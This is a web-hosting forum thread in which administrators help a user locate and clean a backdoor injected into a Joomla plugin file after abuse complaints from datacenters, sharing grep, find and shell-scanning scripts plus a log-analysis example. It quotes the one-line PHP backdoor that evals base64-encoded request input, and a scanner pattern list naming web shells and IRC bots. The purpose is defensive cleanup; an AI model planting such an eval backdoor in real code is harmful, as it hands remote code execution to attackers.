Thread: Find a PHP code in all PHP files
-
03-09-2013, 03:44 AM #1Newbie
- Join Date
- Feb 2013
- Posts
- 12
Find a PHP code in all PHP files
Hi to all,
I've received a few complaints from the xlhost datacenter:
Subject : TOS Violation - Malicious Activity
Abuse Team,
It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords were compromised and they should be changed to prevent re-infection.
All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
curl -A "Mozilla/4.0" -iL
Please note the HTTP status in the first line of output; if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in subsequent lines.
Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
Regards,
Abuse Team
Bank of America
*********************************************************************************************************************************
Examples of Malicious Content
*********************************************************************************************************************************
Malicious content:
xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,
This site is Joomla 1.5.
I've checked the dvmessages.php file; it was attached as hacked file.php.
I examined a normal dvmessages.php file; it was attached as normal file.php.
The difference between the two files is the hacked code below:
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
I want to search for this code defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); in all users' PHP files under the /home folder.
Please help me.
Thanks all
-
03-09-2013, 05:05 AM #2Newbie
- Join Date
- Jun 2011
- Location
- India
- Posts
- 16
Hello Friend,
To find specific content in different files in a directory, you can use the command below. This command will give a list of files that contain "JEXEC" along with the paths to the files.
grep -irl JEXEC /home
You can replace JEXEC with the content you want to search for.
You can also search like "defined( '_JEXEC' )", i.e. within "", if it contains spaces.
Please try.
-
03-09-2013, 08:37 AM #3Newbie
- Join Date
- Jul 2009
- Posts
- 12
Hello
I want to know how XLHost can find it? Please contact them and ask.
Maybe they have a finder for these files.
Thank you
-
03-09-2013, 09:42 AM #4Web Hosting Master
- Join Date
- Jul 2009
- Posts
- 1,568
To search all the files of all accounts on the server, use the below command:
# single quotes: the shell must not expand $_REQUEST inside the pattern
for i in $(awk '{print $2}' /etc/trueuserdomains); do grep -rlF 'eval(base64_decode($_REQUEST' "/home/$i/public_html"; done
| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux
-
03-21-2013, 02:02 PM #5Newbie
- Join Date
- Feb 2013
- Posts
- 12
-
03-21-2013, 02:18 PM #6Web Hosting Master
- Join Date
- May 2012
- Location
- Linux World
- Posts
- 1,137
try this,
# single quotes: the shell must not expand $_REQUEST inside the pattern
find /home/ -type f -name '*.php' -exec grep -ilF 'eval(base64_decode($_REQUEST' {} +
Kevin Cheri : Senior Server Administrator / Freelancer : 13+ years Exp, reach me out for any help
Server Optimization Expert / Mysql Guru / Migration Specialist
Skype : lynxmaestro
Gmail : cheri.kevin@gmail.com
-
03-21-2013, 05:05 PM #7WHT Addict
- Join Date
- Aug 2010
- Location
- /bin/bash
- Posts
- 129
You can use the following script as well. Save it as scan.sh and then give it execute permission. Just add the search pattern that you require to the "pattern" line. You can see some common patterns already defined in the script. You will get the output in a file named report.<pid>.
#!/bin/bash
# extended regex; add your own signatures as further | alternatives
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
# -print0/-0 keep file names with spaces intact; /dev/null makes grep -l always print file names
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl$' \) -print0 | xargs -0 grep -Eil "$pattern" /dev/null | sort >> report.$$
cat report.$$
When all else fails ... Read the documentation!!!
-
03-22-2013, 02:30 AM #8Newbie
- Join Date
- Jul 2009
- Posts
- 12
Hello
Where can I use this?
Copy it into a .sh file and run it?
I received mail from my data center about this problem.
Dear Sir or Madam,
We have received spam/abuse notification. Please take the necessary
steps to prevent this from happening again in future.
Furthermore, we would request that you provide both ourselves and the
person who has submitted this complaint with a short statement within
24 hours. This statement should include details of the events leading
up to the incident and the steps you are taking to deal with it.
Next steps:
- Solve the problem
- Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link to reply to abuse]
- Send your statement to the person making the complaint per email
The details will then be checked by a colleague, who will coordinate
further proceedings. In the event of several complaints, this may
lead to the server being locked.
Important information:
When replying to us, please leave the Abuse ID [AbuseID:000000] in
the subject line unchanged.
Kind regards,
Sandra Betz
Hetzner Online AG
Stuttgarter Straße 1
91710 Gunzenhausen
Tel: + 49 (0)9831 610061
Fax: + 49 (0)9831 61006-2
abuse@hetzner.de
www.hetzner.com
Register Court: Registergericht Ansbach, HRB 3204
Management Board: Dipl. Ing. (FH) Martin Hetzner
Chairwoman of the Supervisory Board: Diana Rothhan
----- attachment -----
Dear Hetzner Abuse Team,
We have been informed of web servers in Germany which were apparently
compromised and are participating in DDoS attacks. Below is the list of
servers that are in your network area. The URL points to scripts that
have apparently been uploaded onto the servers by the attacker.
----- log file -----
IP: my server ip
Script(s):
http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
-
03-22-2013, 02:29 PM #9WHT Addict
- Join Date
- Aug 2010
- Location
- /bin/bash
- Posts
- 129
Hi,
First of all you should disable the following files, or your DC will suspend your server.
http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
This dvmessages.php seems to be infected, and it is part of a Joomla plugin. Check the access log for the IPs that accessed the PHP file and block them. It would be better to suspend the account and reactivate it only after updating Joomla/the plugin. Update the DC that you have disabled the files, blocked the IPs and disabled the website, and will enable it only after updating the outdated plugins.
You may check for similar files like dvmessages.php using the following commands.
updatedb
locate dvmessages.php
If you are not sure about this, I would recommend you hire an administrator who knows about this.
For executing the script, just create a file named scan.sh and copy paste the script contents.
Save it.
Provide execute permission using the following.
chmod +x scan.sh
./scan.sh
Cheers!!!
When all else fails ... Read the documentation!!!
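Post #9 says to check the access log for the IPs that hit the file and block them. The script below, added here as an example and not code from any poster in this thread, does that first step over an Apache "combined" format log: it counts requests for the reported path per client IP and prints, without running, the matching iptables DROP rules for review. The log lines, addresses and user agents are constructed for the demo (documentation-range IPs), and the log path is a temp file rather than a real /var/log location.

```shell
#!/bin/sh
# Added example, not code from the thread. Finds which client IPs requested
# the reported file in an Apache "combined" access log, as post #9 suggests,
# and prints the block rules for review. The log lines, IPs and user agents
# below are constructed for the demo (documentation-range addresses).

LOG=$(mktemp)
cat > "$LOG" <<'EOF'
203.0.113.7 - - [20/Mar/2013:10:01:02 +0000] "POST /plugins/system/dvmessages.php HTTP/1.1" 200 17 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Mar/2013:10:01:05 +0000] "POST /plugins/system/dvmessages.php HTTP/1.1" 200 17 "-" "Mozilla/4.0"
198.51.100.23 - - [20/Mar/2013:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [20/Mar/2013:10:02:09 +0000] "GET /plugins/system/dvmessages.php HTTP/1.1" 200 17 "-" "curl/7.29.0"
192.0.2.9 - - [20/Mar/2013:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
EOF

# hits_by_ip LOG PATTERN: requests whose URL path ($7 in the combined format)
# matches PATTERN, counted per client IP ($1), most active first.
# Output: "<count> <ip>" per line.
hits_by_ip() {
    awk -v pat="$2" '$7 ~ pat { n[$1]++ } END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# block_rules LOG PATTERN: print (do not run) one iptables DROP rule per IP
# that touched the file. Review the list first: a datacenter or monitoring
# scanner that fetched the URL to confirm the report would show up here too.
block_rules() {
    hits_by_ip "$1" "$2" | while read -r count ip; do
        echo "iptables -I INPUT -s $ip -j DROP   # $count request(s)"
    done
}

echo "Requests for dvmessages.php by client IP:"
hits_by_ip "$LOG" 'dvmessages[.]php'
echo "Proposed block rules:"
block_rules "$LOG" 'dvmessages[.]php'
```

The POST requests are the interesting ones: the backdoor reads its payload from $_REQUEST, so a POST body never appears in the access log and the only evidence is the request line itself. Remove the temp log when done.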
-
03-23-2013, 10:20 AM #10I Like Beer!
- Join Date
- Sep 2008
- Location
- NL,IR
- Posts
- 1,491
-
03-26-2013, 01:39 AM #11Newbie
- Join Date
- Feb 2013
- Posts
- 12
Hi
How can I create a .sh to search with the code
for i in $(awk '{print $2}' /etc/trueuserdomains); do grep -rlF 'eval(base64_decode($_REQUEST' "/home/$i/public_html"; done
and save all results, and move the found files to another directory, for example /home/Quarantine?
When the .sh file runs it should search for the files, move them to another folder and report the scan results.
Thank you